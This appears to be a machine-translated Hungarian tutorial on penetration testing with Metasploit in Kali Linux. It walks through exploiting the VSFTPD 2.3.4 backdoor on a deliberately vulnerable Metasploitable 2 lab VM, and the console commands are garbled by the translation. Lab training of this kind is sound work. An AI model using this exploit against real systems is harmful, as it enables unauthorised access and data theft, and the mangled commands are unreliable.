Metasploit a Kali Linux 2020 -ban

Metasploit Kali Linux 2020



Behatolási tesztelés Kali Linux rendszerrel


Az internet tele van rosszindulatú szándékú lurkókkal, akik hozzáférni akarnak a hálózatokhoz és ki akarják használni az adataikat, miközben elkerülik az észlelést. Csak akkor van értelme biztosítani a hálózat biztonságát, ha sebezhetőséget mér. A penetrációs tesztelés vagy az etikus hackelés az, ahogyan teszteljük a hálózatokat vagy a szervereket a terhes célpontokra azáltal, hogy meghatározzuk az összes lehetséges jogsértést, amelyet a hacker felhasználhat a hozzáféréshez, ezáltal csökkentve a biztonsági kompromisszumokat. A behatolási teszteket gyakran szoftveralkalmazásokon keresztül végzik, amelyek közül a legnépszerűbb a Kali Linux, lehetőleg a Metasploit keretrendszerrel. Ragaszkodjon a végéig, hogy megtanulja, hogyan kell tesztelni a rendszert egy támadás végrehajtásával a Kali Linux segítségével.

Bevezetés a Kali Linux és Metasploit keretrendszerbe

Kali Linux az egyik a számos fejlett rendszerbiztonsági eszköz közül, amelyeket az Offensive Security fejlesztett ki (és rendszeresen frissít). Ez egy Linux alapú operációs rendszer, amely főleg penetrációs tesztelésre tervezett eszközkészlettel rendelkezik. Használata meglehetősen egyszerű (legalábbis más tollvizsgáló programokhoz képest), és elég bonyolult ahhoz, hogy megfelelő eredményeket mutasson.







Az Metasploit keretrendszer egy nyílt forráskódú moduláris penetrációs tesztplatform, amelyet a biztonsági támadások tesztelésére használt rendszerek megtámadására használnak. Ez az egyik leggyakrabban használt penetrációs tesztelő eszköz, és beépített Kali Linux.



A Metasploit adattárból és modulokból áll. Az adattároló lehetővé teszi a felhasználó számára a keretrendszerben lévő szempontok konfigurálását, míg a modulok önálló kódrészletek, amelyekből a Metasploit szolgáltatásai származnak. Mivel a tollatesztelés támadásainak végrehajtására összpontosítunk, a vitát a modulokról folytatjuk.



Összesen öt modul létezik:





Kihasználni - elkerüli az észlelést, betör a rendszerbe és feltölti a hasznos terhelés modult
Hasznos teher - Lehetővé teszi a felhasználó számára, hogy hozzáférjen a rendszerhez
Kiegészítő - támogatja a jogsértést a kizsákmányoláshoz nem kapcsolódó feladatok elvégzésével
Hozzászólás - Művelet - további hozzáférést tesz lehetővé a már veszélyeztetett rendszerbe
NOP generátor - a biztonsági IP -k megkerülésére szolgál

Céljainkhoz az Exploit és a hasznos terhelés modulokat fogjuk használni, hogy hozzáférjünk a célrendszerünkhöz.



A tollvizsgáló labor beállítása

Szükségünk lesz a következő szoftverre:

Kali Linux:

A Kali Linuxot a helyi hardverünkről üzemeltetjük. A Metasploit keretrendszert fogjuk használni a kizsákmányolások megtalálására.

Egy hipervizor:

Szükségünk lesz egy hipervizorra, mivel lehetővé teszi a Virtuális gép , amely lehetővé teszi számunkra, hogy egyszerre több operációs rendszeren dolgozzunk. Ez elengedhetetlen előfeltétele a penetrációs teszteknek. A sima vitorlázás és a jobb eredmények érdekében javasoljuk bármelyik használatát Virtualbox vagy Microsoft Hyper-V hogy létrehozza a virtuális gépet .

Metasploitable 2

Nem tévesztendő össze a Metasploit -val, amely a Kali Linux keretrendszere, a metasploitable szándékosan sebezhető virtuális gép, amely kiberbiztonsági szakemberek képzésére van programozva. A Metasploitable 2 rengeteg ismert tesztelhető biztonsági rést tartalmaz, amelyeket kihasználhatunk, és elegendő információ áll rendelkezésre a weben, hogy segítsen nekünk az indulásban.

Bár a virtuális rendszer megtámadása a Metasploitable 2 -ben egyszerű, mert sebezhetőségei jól dokumentáltak, sokkal több szakértelemre és türelemre lesz szüksége a valódi gépekkel és hálózatokkal kapcsolatban, amelyeknek végül el kell végeznie a penetrációs tesztet. De a metasploitable 2 használata a toll teszteléséhez kiváló kiindulópont a módszer megismeréséhez.

A metasploitable 2-t fogjuk használni a tollatesztelés folytatásához. A virtuális gép működéséhez nem kell sok számítógépmemória, a 10 GB -os merevlemez -terület és az 512 MB memória remekül működik. Csak győződjön meg arról, hogy a Metasploitable hálózati beállításait a gazdagép-adapterre módosítja telepítés közben. A telepítés után indítsa el a Metasploitable alkalmazást, és jelentkezzen be. Indítsa el a Kali Linuxot, hogy a Metasploit keretrendszer működőképessé tegye a tesztelés elindítását.

A VSFTPD v2.3.4 Backdoor Command Execution kihasználása

Ha minden a helyén van, végre kereshetünk egy kihasználható sebezhetőséget. Kereshet a weben különböző biztonsági réseket, de ebben az oktatóanyagban látni fogjuk, hogyan lehet kihasználni a VSFTPD v2.3.4 verzióját. A VSFTPD egy nagyon biztonságos FTP démon. Ezt azért választottuk, mert engedély nélkül kérünk teljes hozzáférést a Metasploitable felületéhez.

Indítsa el a Metasploit konzolt. Lépjen a Kali Linux parancssorába, és írja be a következő kódot:

$sudomsfconsole

A konzol megnyitásakor írja be:

$keresés vsftpd

Ezzel megjelenik a sérülékenység helye, amelyet ki akarunk használni. A kiválasztásához írja be

$exploitot használni/unix/ftp/vsftpd_234_ajtó

Ha meg szeretné tekinteni, milyen további információkra van szüksége a kihasználás indításához, írja be

$opciók megjelenítése

Az egyetlen lényeges fontosságú információ hiányzik az IP, amelyet megadunk.

Gépeléssel keresse meg az IP -címet a metasploitable -ban

$ifconfig

A parancshéjában

Az IP -cím a második sor elején van, valami hasonló

#inet addr: 10.0.2.15

Írja be ezt a parancsot, hogy a Metasploit -ot a célrendszerre irányítsa, és kezdje meg a kihasználást. Az ip -t használom, de ez hibát eredményez, azonban ha másik áldozat IP -t használ, akkor eredményeket kap a kihasználástól

$készletHALLGAT[áldozat IP]

$fuss

Most, hogy a Metasploitable teljes hozzáféréssel rendelkezik, korlátozások nélkül navigálhatunk a rendszeren. Letölthet bármilyen minősített adatot, vagy eltávolíthat bármit, ami fontos a szerverről. Valódi helyzetekben, amikor egy blackhat hozzáférhet egy ilyen szerverhez, akár le is állíthatják a CPU -t, ami a többi, hozzá csatlakozó számítógép összeomlásához is vezethet.

A dolgok becsomagolása

Jobb, ha előzetesen kiküszöböli a problémákat, mintsem reagáljon rájuk. A behatolási tesztekkel sok fáradságtól és felzárkózástól spórolhat meg, amikor a rendszerei biztonságáról van szó, legyen szó egyetlen számítógépes gépről vagy egy teljes hálózatról. Ezt szem előtt tartva hasznos, ha alapvető ismeretekkel rendelkezik a tollvizsgálatról. A Metasploitable kiváló eszköz a lényeges ismeretek megtanulására, mivel sebezhetőségei jól ismertek, így sok információ található róla. A Kali Linuxon csak egy kihasználáson dolgoztunk, de erősen javasoljuk, hogy vizsgálja meg jobban őket.